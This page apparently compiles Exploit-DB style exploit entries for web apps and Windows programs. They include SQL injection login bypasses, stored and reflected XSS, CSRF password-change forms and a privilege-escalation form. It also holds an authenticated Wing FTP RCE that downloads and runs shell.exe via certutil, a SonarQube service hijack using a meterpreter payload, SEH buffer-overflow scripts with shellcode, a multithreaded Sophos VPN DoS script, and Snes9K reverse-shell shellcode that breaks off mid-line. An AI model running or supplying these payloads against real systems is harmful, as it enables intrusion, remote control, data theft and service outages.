ISHACK AI BOT

# Exploit Title: Web Based Online Hotel Booking System 0.1.0 - Authentication Bypass # Date: 2020-07-03 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://github.com/mrzulkarnine/Web-based-hotel-booking-system # Software Link: https://github.com/mrzulkarnine/Web-based-hotel- booking-system # Version: 0.1.0 # Tested on: Kali Linux Source code(localhost/admin/loginauth.php): <?php session_start(); $_SESSION['username'] = $_POST['username']; $_SESSION['password'] = $_POST['password']; include './auth.php'; $re = mysql_query("select * from user where username = '".$_SESSION['username']."' AND password = '".$_SESSION['password']."' " ); echo mysql_error(); if(mysql_num_rows($re) > 0) { header('Refresh: 0;url=dashboard.php'); } else { session_destroy(); header("location: index.htm"); } ?> Payload: Username: 1' or 1 = 1 LIMIT 1# Password: 1' or 1 = 1 LIMIT 1#

# Exploit Title: Online Polling System 1.0 - Authentication Bypass # Date: 2020-07-20 # Author: AppleBois # Version: NULL # Software Link: https://www.sourcecodester.com/php/14330/online-polling-system.html # # Administration Control Panel || Authentication Bypass # Unthenticated User perform SQL Injection bypass login mechanism on /admin/checklogin.php # ###################################################################################### #Vulnerable Code # #$myusername=$_POST['myusername']; #$mypassword=$_POST['mypassword']; #$encrypted_mypassword=md5($mypassword); # #$result=mysqli_query($conn, "SELECT * FROM `tbadministrators` WHERE email='$myusername' and password='$encrypted_mypassword'"); # #$count=mysqli_num_rows($result); # #if($count==1){ # #$user = mysqli_fetch_assoc($result); #$_SESSION['member_id'] = $user['member_id']; #header("location:student.php"); #} # ###################################################################################### POST /admin/checklogin.php HTTP/1.1 Host: 10.10.10.2:81 Content-Length: 53 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://10.10.10.2:81 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://10.10.10.2:81/online/index.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70; PHPSESSID=1gpgmmltf6uk3ju3aakgd0s8m5 Connection: close myusername=' or 1=1#&mypassword=ad&Submit=Login

# Exploit Title: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting # Date: 2020-06-29 # Exploit Author: KeopssGroup0day,Inc # Vendor Homepage: https://www.sourcecodester.com/php/14198/online-farm-management-system-phpmysql.html # Software Link: https://www.campcodes.com/projects/php/249/farm-management-system-in-php-mysql/ # Version: 0.1.0 # Tested on: Kali Linux Source code(review.php): <?php if($result) : while($row1 = $result->fetch_array()) : ?> <div class="con"> <div class="row"> <div class="col-sm-4"> <em style="color: black;"><?= $row1['comment']; ?></em> </div> POC: 1. http://192.168.1.58/a/review.php?pid=31 go 2. We send the payload (<script>alert(1)</script>) 3. Write a review payload and submit 4. And refresh the page

# Exploit Title: Wing FTP Server 6.3.8 - Remote Code Execution (Authenticated) # Date: 2020-06-26 # Exploit Author: v1n1v131r4 # Vendor Homepage: https://www.wftpserver.com/ # Software Link: https://www.wftpserver.com/download.htm # Version: 6.3.8 # Tested on: Windows 10 # CVE : -- Wing FTP Server have a web console based on Lua language. For authenticated users, this console can be exploited to obtaining a reverse shell. 1) Generate your payload (e.g. msfvenom) 2) Send and execute via POST POST /admin_lua_.html?r=0.3592753444724336 HTTP/1.1 Host: 192.168.56.105:5466 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.56.105:5466/admin_lua_term.html Content-Type: text/plain;charset=UTF-8 Content-Length: 153 Connection: close Cookie: admin_lang=english; admin_login_name=admin; UIDADMIN=75e5058fb61a81e427ae86f55794f1f5 command=os.execute('cmd.exe%20%2Fc%20certutil.exe%20-urlcache%20-split%20-f%20http%3A%2F%2F192.168.56.103%2Fshell.exe%20c%3A%5Cshell.exe%20%26shell.exe')

# Exploit Title: Infor Storefront B2B 1.0 - 'usr_name' SQL Injection # Google Dork: inurl:storefrontb2bweb # Date: 2020-06-27 # Exploit Author: ratboy # Vendor Homepage: https://www.insitesoft.com/infor-storefront/ # Version: Infor Storefront # Tested on: Windows All Versions [POC Multiple Vulns] python sqlmap.py -u "http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass" -p usr_name --dbms=mssql --level=5 --risk=3 --tamper=between,space2comment -o --random-agent --parse-errors --os-shell --technique=ES python sqlmap.py -u "http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1" -p itm_id --dbms=mssql --level=5 --risk=3 --tamper=between,space2comment -o --random-agent --parse-errors --os-shell --technique=ES or... http://localhost/storefrontB2BWEB/login.do?setup_principal=true&action=prepare_forgot&login=true&usr_name=ass'[SQL INJECTION];-- http://localhost/storefrontB2CWEB/cart.do?action=cart_add&itm_id=1'[SQL INJECTION];-- -- Sincerly, Aaron Schrom

# Title: Sonar Qube 8.3.1 - 'SonarQube Service' Unquoted Service Path # Author: Velayutham Selvaraj # Date: 2020-06-03 # Vendor Homepage: https://www.sonarqube.org # Software Link: https://www.sonarqube.org/downloads/ # Version : 8.3.1 # Tested on: Windows 10 64bit(EN) About Unquoted Service Path : ============================== When a service is created whose executable path contains spaces and isn't enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). Steps to recreate : ============================= 1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ] 2. The Vulnerable Service would Show up. 3. Check the Service Permissions by typing [ sc qc SonarQube] 4. The command would return.. C:\Users\HP-840-G2-ELITEBOOK>sc qc SonarQube [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SonarQube TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\wrapper.exe -s C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\conf\wrapper.conf LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : SonarQube DEPENDENCIES : SERVICE_START_NAME : LocalSystem 5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine" 6. Now create a Payload with msfvenom or other tools and name it to wrapper.exe 7. Make sure you have write Permissions to where you downloaded. i kept it in downloads folders but confirmed it in program files as well. 8. Provided that you have right permissions, Drop the wrapper.exe executable you created into the "C:\Users\HP-840-G2-ELITEBOOK\Downloads\sonarqube-8.3.1.34397\sonarqube-8.3.1.34397\bin\windows-x86-64\" Directory. 9. Now restart the IObit Uninstaller service by giving coommand [ sc stop SonarQube] followed by [ sc start SonarQube] 10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege]. During my testing : Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o wrapper.exe Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ]

# Exploit Title: Simple Startup Manager 1.17 - 'File' Local Buffer Overflow (PoC) # Exploit Author: PovlTekstTV # Date: 2020-07-15 # Vulnerable Software: Simple Startup Manager # Software Link Download: http://www.ashkon.com/download/startup-manager.exe # Version: 1.17 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 Ultimate Service Pack 1 (32 and 64 bit) # DEP and ASLR Disabled on system # Space for shellcode: 264 #!/usr/bin/python # Two sets of instructions are needed: # 1. JMP EDI # 2. JMP EBX # I found these in the OS-module: SETUPAPI.dll, which is usually protected using ASLR # The exploit will properly not work unless changed/bruteforced. # It is also possible to overwrite the SEH-handler with 600+ bytes, # however I did not find any POP, POP, RETs. # Walkthrough: # 1.- Run the python script, it will create a new file "exploit.txt" # 2.- Copy the content of the new file 'exploit.txt' to clipboard # 3.- Turn off DEP for startup-manger.exe # 4.- Open 'startup-manger.exe' # 5.- Click 'New' or go to 'File' and click 'New' # 6.- Paste content from clipboard into 'File' parameter # 7.- Click on 'OK' # 9.- Calc.exe runs. #Identified the following badchars: x00 x0a x09 x0c x0d x3a x5c #msfvenom -p windows/exec cmd=calc.exe -f c -b "\x00\x0a\x0c\x0d\x3a\x5c" shellcode = ("\xdb\xd0\xd9\x74\x24\xf4\xbe\xcb\xe3\xc2\xa5\x5a\x33\xc9\xb1" "\x31\x83\xc2\x04\x31\x72\x14\x03\x72\xdf\x01\x37\x59\x37\x47" "\xb8\xa2\xc7\x28\x30\x47\xf6\x68\x26\x03\xa8\x58\x2c\x41\x44" "\x12\x60\x72\xdf\x56\xad\x75\x68\xdc\x8b\xb8\x69\x4d\xef\xdb" "\xe9\x8c\x3c\x3c\xd0\x5e\x31\x3d\x15\x82\xb8\x6f\xce\xc8\x6f" "\x80\x7b\x84\xb3\x2b\x37\x08\xb4\xc8\x8f\x2b\x95\x5e\x84\x75" "\x35\x60\x49\x0e\x7c\x7a\x8e\x2b\x36\xf1\x64\xc7\xc9\xd3\xb5" "\x28\x65\x1a\x7a\xdb\x77\x5a\xbc\x04\x02\x92\xbf\xb9\x15\x61" "\xc2\x65\x93\x72\x64\xed\x03\x5f\x95\x22\xd5\x14\x99\x8f\x91" "\x73\xbd\x0e\x75\x08\xb9\x9b\x78\xdf\x48\xdf\x5e\xfb\x11\xbb" "\xff\x5a\xff\x6a\xff\xbd\xa0\xd3\xa5\xb6\x4c\x07\xd4\x94\x1a" "\xd6\x6a\xa3\x68\xd8\x74\xac\xdc\xb1\x45\x27\xb3\xc6\x59\xe2" "\xf0\x39\x10\xaf\x50\xd2\xfd\x25\xe1\xbf\xfd\x93\x25\xc6\x7d" "\x16\xd5\x3d\x9d\x53\xd0\x7a\x19\x8f\xa8\x13\xcc\xaf\x1f\x13" "\xc5\xd3\xfe\x87\x85\x3d\x65\x20\x2f\x42") payload = shellcode payload += ("A"*(268-len(payload)-4)) payload += ("\xe4\xa9\x4e\x76") #0x764ea9e4 (JMP EBX) {PAGE_READONLY} [SETUPAPI.dll] payload += ("\x5f\xbc\x4e\x76") #0x764ebc5f (JMP EDI) {PAGE_READONLY} [SETUPAPI.dll] #Write payload to file file = open("exploit.txt" , 'w') file.write(payload) file.close()

# Exploit Title: CMSUno 1.6 - Cross-Site Request Forgery (Change Admin Password) # Date: 2020-05-31 # Exploit Author: Noth # Vendor Homepage: https://github.com/boiteasite/cmsuno # Software Link: https://github.com/boiteasite/cmsuno # Version: v1.6 # CVE : 2020-15600 An issue was discovered in CMSUno before 1.6.1. uno.php allows CSRF to change the admin password. PoC : <html> <body> <script>history.pushState(",",'/')</script> <form action=“http://127.0.0.1/cmsuno-master/uno.php”method=“POST”> <input type=“hidden” name=“user” value=“admin”/> <input type=“hidden” name=“pass” value=“yourpassword”/> <input type=“submit” name=“user” value=“Submit request”/> </form> </body> </html>

# Exploit Title: NetPCLinker 1.0.0.0 - Buffer Overflow (SEH Egghunter) # Date: 2019-06-28 # Exploit Author: Saeed reza Zamanian # Vendor Homepage: https://sourceforge.net/projects/netpclinker/ # Software Link: https://sourceforge.net/projects/netpclinker/files/ # Version: 1.0.0.0 # Tested on: Windows Vista SP1 #!/usr/bin/python ''' # Replicate Crash: 1) Install and Run the application 2) Go to second tab "Clients Control Panel" 3) Press Add button 4) Run the exploit , the exploit creates a text file named payload.txt 5) Copy payload.txt contents into the add client dialog , "DNS/IP" field 6) Press OK . Your shellcode will be executed by pressing OK button. ''' #msfvenom -p windows/exec CMD=calc -f c -b "\x00\x0a\x0d\x33\x35\x36" #Bad Characters : \x0a\x0d\x33\x35\x36 shellcode = ( "\xdb\xc4\xd9\x74\x24\xf4\x5b\xbe\x9a\x32\x43\xd2\x31\xc9\xb1" "\x30\x83\xc3\x04\x31\x73\x14\x03\x73\x8e\xd0\xb6\x2e\x46\x96" "\x39\xcf\x96\xf7\xb0\x2a\xa7\x37\xa6\x3f\x97\x87\xac\x12\x1b" "\x63\xe0\x86\xa8\x01\x2d\xa8\x19\xaf\x0b\x87\x9a\x9c\x68\x86" "\x18\xdf\xbc\x68\x21\x10\xb1\x69\x66\x4d\x38\x3b\x3f\x19\xef" "\xac\x34\x57\x2c\x46\x06\x79\x34\xbb\xde\x78\x15\x6a\x55\x23" "\xb5\x8c\xba\x5f\xfc\x96\xdf\x5a\xb6\x2d\x2b\x10\x49\xe4\x62" "\xd9\xe6\xc9\x4b\x28\xf6\x0e\x6b\xd3\x8d\x66\x88\x6e\x96\xbc" "\xf3\xb4\x13\x27\x53\x3e\x83\x83\x62\x93\x52\x47\x68\x58\x10" "\x0f\x6c\x5f\xf5\x3b\x88\xd4\xf8\xeb\x19\xae\xde\x2f\x42\x74" "\x7e\x69\x2e\xdb\x7f\x69\x91\x84\x25\xe1\x3f\xd0\x57\xa8\x55" "\x27\xe5\xd6\x1b\x27\xf5\xd8\x0b\x40\xc4\x53\xc4\x17\xd9\xb1" "\xa1\xe8\x93\x98\x83\x60\x7a\x49\x96\xec\x7d\xa7\xd4\x08\xfe" "\x42\xa4\xee\x1e\x27\xa1\xab\x98\xdb\xdb\xa4\x4c\xdc\x48\xc4" "\x44\xbf\x0f\x56\x04\x40" ) egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x65\x7a\x61\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" nSEH = '\xEB\xAA\x90\x90' #Jump Back # (Vista) # PPR(ecx) : 0x00494b67 : startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [NPL.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.0.0.0 (C:\Program Files\NetPCLinker\NPL.exe) SEH = '\x67\x4b\x49' offset = "RezaReza"+shellcode +'\x41'*(1199-8-len(shellcode)-len(egghunter)-50) payload = offset+egghunter+"\x90"*50+nSEH+SEH try: f=open("payload.txt","w") print("[+] Creating %s bytes payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")

# Exploit Title: WordPress Theme NexosReal Estate 1.7 - 'search_order' SQL Injection # Google Dork: inurl:/wp-content/themes/nexos/ # Date: 2020-06-17 # Exploit Author: Vlad Vector # Vendor: Sanljiljan [ https://themeforest.net/user/sanljiljan ] # Software Version: 1.7 # Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242 # Tested on: Debian 10 # CVE: CVE-2020-15363, CVE-2020-15364 # CWE: CWE-79, CWE-89 ### [ Info: ] [i] The Nexos theme through 1.7 for WordPress allows side-map/?search_order= SQL Injection. ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS [x] SQL Injection ### [ PoC Unauthenticated Reflected XSS: ] [!] TARGET/TARGET-DIR/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`VLΛDVΞCTOR`);window.location=`https://twitter.com/vlad_vector`%3E> [!] GET /TARGET-DIR/top-map/?search_order=idlisting%20DESC&search_location=%22%3E%3Cimg%20src=x%20onerror=alert(`VL%CE%9BDV%CE%9ECTOR`);window.location=`https://twitter.com/vlad_vector`%3E%3E HTTP/1.1 Host: listing-themes.com ### [ PoC SQL Injection: ] [!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -dbs --random-agent --threads 4 [02:23:33] [INFO] the back-end DBMS is MySQL [02:23:33] [INFO] fetching database names [02:23:33] [INFO] fetching number of databases [02:23:33] [INFO] resumed: 2 available databases [2]: [*] geniuscr_nexos [*] information_schema [!] sqlmap --url="TARGET/TARGET-DIR/side-map/?search_order=idlisting%20DESC" -D geniuscr_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8 Database: TARGET-DB Table: wp_users [9 entries] +--------------+------------------------------------+-------------------------+

# Exploit Title: Docsify.js 4.11.4 - Reflective Cross-Site Scripting # Date: 2020-06-22 # Exploit Author: Amin Sharifi # Vendor Homepage: https://docsify.js.org # Software Link: https://github.com/docsifyjs/docsify # Version: 4.11.4 # Tested on: Windows 10 # CVE : CVE-2020-7680 docsify.js uses fragment identifiers (parameters after # sign) to load resources from server-side .md files. it then renders the .md file inside the HTML page. For example : https://docsify.js.org/#/quickstart sends an ajax to https://docsify.js.org/quickstart.md and renders it inside the html page. due to lack of validation it is possible to provide external URLs after the /#/ and render arbitrary javascript/HTML inside the page which leads to DOM-based Cross Site Scripting (XSS). Steps to reproduce: step 1. setup a server (for example I use flask here, for the POC im hosting one on https://asharifi.pythonanywhere.com ) step 2. the server should respond to request to /README.md with a crafted XSS payload. here is the payload "Html Injection and XSS PoC</p><img src=1 onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>" also the CORS should be set so that other Origins would be able to send ajax requests to the server so Access-Control-Allow-Origin must be set to * (or to the specific domain that you wanna exploit) example code below: ------------------------------------------------- from flask import Flask import flask app = Flask(__name__) @app.route('/README.md') def inject(): resp = flask.Response("Html Injection and XSS PoC</p><img src=1 onerror=alert(1)><img src=1 onerror=alert(document.cookie)><p>") resp.headers['Access-Control-Allow-Origin'] = '*' return resp ------------------------------------------------------ step 3. craft the link for execution of the exploit for example for https://docsify.js.org website you can create the link as below https://docsify.js.org/#//asharifi.pythonanywhere.com/README (note that the mentioned domain is no longer vulnerable at the time writing this report) when a user visits this URL an ajax request will be sent to asharifi.pythonanywhere.com/README.md and the response of the request will be rendered inside the webpage which results in XSS payload being executed on the page. snyk advisory: https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099 Mitre CVE entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7680

# Exploit Title: Sophos VPN Web Panel 2020 - Denial of Service (Poc) # Date: 2020-06-17 # Exploit Author: Berk KIRAS # Vendor Homepage: https://www.sophos.com/ # Version:2020 Web Panel # Tested on: Apache # Berk KIRAS PwC - Cyber Security Specialist # Sophos VPN Web Portal Denial of Service Vulnerability # System parse JSON data. If we want to send some JSON with invalid data format # for ex. valid -> {"test","test2"} , invalid -> {"test",PAYLOAD"test2"} # The system can not parse this data fastly and service down # payload_option2 ="../../../../../../../../../FILE./FILE" #!/usr/bin/python3 import requests import sys import random import threading def send_req(): cnt = random.randint(9,22) payload= "../"*cnt+'{FILE}' my_datas_params = {"username":"test", payload+"password":"admin", "cookie":"0", "submit":"<div class=\"login_screen_login_button_left\"></div><div class=\"login_screen_login_button_middle\">Oturum Aç</div><div class=\"login_screen_login_button_right\"></div>", "language":"turkish", "browser_id":"kbgacsyo-q4j5o7lr70e"} # You should change some values into the headers Host_addr = sys.argv[2] Origin=sys.argv[1]+"://"+sys.argv[2] Referrer=sys.argv[1]+"://"+sys.argv[2] Cookie=sys.argv[4] #Headers my_datas_headers ={ "Host":str(Host_addr), "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0", "Accept": "text/javascript, text/html, application/xml, text/xml, */*", "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "X-Prototype-Version": "1.6.1_rc3", "Content-type": "application/json; charset=UTF-8", "Origin":Origin, "Connection": "close", "Referer":Referrer, "Cookie":Cookie, } my_datas_headers2 ={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0", "Accept": "text/javascript, text/html, application/xml, text/xml, */*", "Accept-Language": "tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "X-Prototype-Version": "1.6.1_rc3", "Content-type": "application/json; charset=UTF-8", "Connection": "close", } #If you want to edit and add headers some headers added s = requests.session() #if you want simple-> headers={'User-Agent': 'Mozilla', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'} s.headers.update(my_datas_headers2) print(s.headers.items) r = s.post(sys.argv[1]+"://"+sys.argv[2]+sys.argv[3],data=my_datas_params) return s def main(): if(len(sys.argv) < 6): print("Usage:1) Implement your headers \n2)change payload if you want \n3) exploit.py <http/https> <domain> <page> <cookie-val> <Thread(1-10)> \nExample-> exploit.py http vpn.test.com /test/index.plx 2\nCoded by b3rkk1r4s | PwC Cyber") sys.exit(0) else: try: req_count=0 while(True): if(int(sys.argv[5])==1): resp = send_req() req_count=req_count+1 print("Sending Requests... Count: "+str(req_count)) else: threads = int(sys.argv[5]) jobs = [] for i in range(0, threads): out_list = list() thread = threading.Thread(target=send_req) jobs.append(thread) for j in jobs: j.start() print("Jobs Started!") # Ensure all of the threads have finished for j in jobs: j.join() except Exception: print(Exception) main()

# Exploit Title: FTPDummy 4.80 - Local Buffer Overflow (SEH) # Date: 2020-07-22 # Author: Felipe Winsnes # Software Link: http://www.dummysoftware.com/ftpdummy.html # Version: 4.80 # Tested on: Windows 7 (x86) # Blog: https://whitecr0wz.github.io/ # Proof of Concept: # 1.- Run the python script, it will create the file "ftpdummypref3.dat". # 2.- Place the generated file into "C:\Program Files\FTPDummy!\". # 3.- Open the application. # 4.- Profit. import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 448 bytes buf = b"" buf += b"\x89\xe0\xd9\xc5\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x68\x68\x6e" buf += b"\x62\x53\x30\x53\x30\x67\x70\x35\x30\x6f\x79\x5a\x45" buf += b"\x34\x71\x4f\x30\x71\x74\x4e\x6b\x30\x50\x74\x70\x6c" buf += b"\x4b\x43\x62\x54\x4c\x4e\x6b\x56\x32\x67\x64\x4c\x4b" buf += b"\x32\x52\x36\x48\x74\x4f\x58\x37\x61\x5a\x35\x76\x30" buf += b"\x31\x69\x6f\x6c\x6c\x37\x4c\x35\x31\x31\x6c\x75\x52" buf += b"\x54\x6c\x57\x50\x39\x51\x48\x4f\x66\x6d\x56\x61\x7a" buf += b"\x67\x59\x72\x6c\x32\x52\x72\x63\x67\x4e\x6b\x62\x72" buf += b"\x32\x30\x4e\x6b\x73\x7a\x77\x4c\x6c\x4b\x52\x6c\x54" buf += b"\x51\x53\x48\x68\x63\x51\x58\x37\x71\x4b\x61\x72\x71" buf += b"\x4c\x4b\x32\x79\x61\x30\x47\x71\x5a\x73\x4c\x4b\x57" buf += b"\x39\x76\x78\x48\x63\x47\x4a\x67\x39\x6e\x6b\x50\x34" buf += b"\x6e\x6b\x43\x31\x4a\x76\x34\x71\x69\x6f\x6c\x6c\x49" buf += b"\x51\x6a\x6f\x54\x4d\x65\x51\x68\x47\x45\x68\x6b\x50" buf += b"\x63\x45\x6b\x46\x76\x63\x43\x4d\x6a\x58\x67\x4b\x43" buf += b"\x4d\x74\x64\x51\x65\x4a\x44\x42\x78\x6c\x4b\x76\x38" buf += b"\x56\x44\x53\x31\x6e\x33\x32\x46\x4c\x4b\x36\x6c\x72" buf += b"\x6b\x6c\x4b\x66\x38\x75\x4c\x53\x31\x4a\x73\x6e\x6b" buf += b"\x33\x34\x4c\x4b\x47\x71\x6e\x30\x4b\x39\x77\x34\x44" buf += b"\x64\x35\x74\x51\x4b\x63\x6b\x63\x51\x70\x59\x70\x5a" buf += b"\x76\x31\x69\x6f\x59\x70\x73\x6f\x53\x6f\x71\x4a\x4c" buf += b"\x4b\x46\x72\x38\x6b\x6e\x6d\x71\x4d\x50\x6a\x47\x71" buf += b"\x4e\x6d\x4f\x75\x4e\x52\x47\x70\x37\x70\x53\x30\x42" buf += b"\x70\x32\x48\x76\x51\x6e\x6b\x32\x4f\x4f\x77\x79\x6f" buf += b"\x5a\x75\x4f\x4b\x6b\x50\x47\x6d\x44\x6a\x57\x7a\x50" buf += b"\x68\x79\x36\x4e\x75\x6d\x6d\x6d\x4d\x6b\x4f\x49\x45" buf += b"\x57\x4c\x77\x76\x51\x6c\x74\x4a\x4b\x30\x49\x6b\x59" buf += b"\x70\x34\x35\x63\x35\x4d\x6b\x50\x47\x74\x53\x44\x32" buf += b"\x52\x4f\x31\x7a\x75\x50\x53\x63\x69\x6f\x38\x55\x42" buf += b"\x43\x61\x71\x72\x4c\x65\x33\x54\x6e\x61\x75\x70\x78" buf += b"\x50\x65\x73\x30\x41\x41" start = "\x41"* 8 start += "\x0d\x0a\x31\x0d\x0a" ending = "\x0d\x0a" end = "170.1.1.0" end += "\x0d\x0a" end += "\x22" end += "C:\Archivos2de2programa\FTPDummy!\FTPDummy!2418101EXE" end += "\x22" nseh = "\x70\x08\x71\x06" seh = struct.pack("<I", 0x0044D078) buffer = start + "A" * 477 + nseh + seh + "A" * 5 + buf + "\xff" * 2000 + ending + end try: f = open ("ftpdummypref3.dat", "w") f.write(buffer) f.close() print "[+] The file has been created successfully!" except: print "[!] There has been an error while creating the file."

# Title: UBICOD Medivision Digital Signage 1.5.1 - Authorization Bypass # Date: 2020-07-23 # Author: LiquidWorm # Product web page: http://www.medivision.co.kr # CVE: N/A Vendor: UBICOD Co., Ltd. | MEDIVISION INC. Product web page: http://www.medivision.co.kr Affected version: Firmware 1.5.1 (2013.01.3) Summary: Medivision is a service that provides everything from DID operation to development of DID (Digital Information Display) optimized for hospital environment and production of professional contents, through DID product installation, image, video content planning, design work, and remote control. This is a one-stop solution that solves management at once. Desc: The application suffers from a privilege escalation vulnerability. Normal user can elevate his/her privileges by navigating to /html/user (via IDOR) page sending an HTTP GET request setting the parameter 'ft[grp]' to integer value '3' gaining super admin rights. Tested on: Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.22 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5575 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5575.php 19.06.2020 -- <html> <body> <form action="http://10.0.39.2/query/user/itSet" method="POST"> <input type="hidden" name="aa[_id]" value="157" /> <input type="hidden" name="aa[pass]" value="123456" /> <input type="hidden" name="od[]" value="name" /> <input type="hidden" name="ft[grp]" value="3" /> <input type="hidden" name="ip" value="0" /> <input type="hidden" name="np" value="13" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Snes9K 0.09z - 'Port Number' Buffer Overflow (SEH) # Date: 2020-07-20 # Exploit Author: MasterVlad # Vendor Homepage: https://sourceforge.net/projects/snes9k/ # Software Link: https://www.exploit-db.com/apps/ef5249b64ce34575c12970b334a08c17-snes9k009z.zip # Version: 0.09z # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 10 x64 # Proof of Concept: # 1. Run the python script # 2. Open exploit.txt and copy the content to clipboard # 3. Open Snes9K 0.09z # 4. Click on Netplay -> Connect to Server # 5. Paste the clipboard into the "Port Number" field # 6. Click on Connect and then on OK #!/usr/bin/python # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d" -f py buf = "" buf += "\xd9\xc3\xbf\x7c\xdc\xed\x95\xd9\x74\x24\xf4\x58\x29" buf += "\xc9\xb1\x52\x31\x78\x17\x83\xc0\x04\x03\x04\xcf\x0f" buf += "\x60\x08\x07\x4d\x8b\xf0\xd8\x32\x05\x15\xe9\x72\x71" buf += "\x5e\x5a\x43\xf1\x32\x57\x28\x57\xa6\xec\x5c\x70\xc9" buf += "\x45\xea\xa6\xe4\x56\x47\x9a\x67\xd5\x9a\xcf\x47\xe4" buf += "\x54\x02\x86\x21\x88\xef\xda\xfa\xc6\x42\xca\x8f\x93" buf += "\x5e\x61\xc3\x32\xe7\x96\x94\x35\xc6\x09\xae\x6f\xc8" buf += "\xa8\x63\x04\x41\xb2\x60\x21\x1b\x49\x52\xdd\x9a\x9b" buf += "\xaa\x1e\x30\xe2\x02\xed\x48\x23\xa4\x0e\x3f\x5d\xd6" buf += "\xb3\x38\x9a\xa4\x6f\xcc\x38\x0e\xfb\x76\xe4\xae\x28" buf += "\xe0\x6f\xbc\x85\x66\x37\xa1\x18\xaa\x4c\xdd\x91\x4d" buf += "\x82\x57\xe1\x69\x06\x33\xb1\x10\x1f\x99\x14\x2c\x7f" buf += "\x42\xc8\x88\xf4\x6f\x1d\xa1\x57\xf8\xd2\x88\x67\xf8" buf += 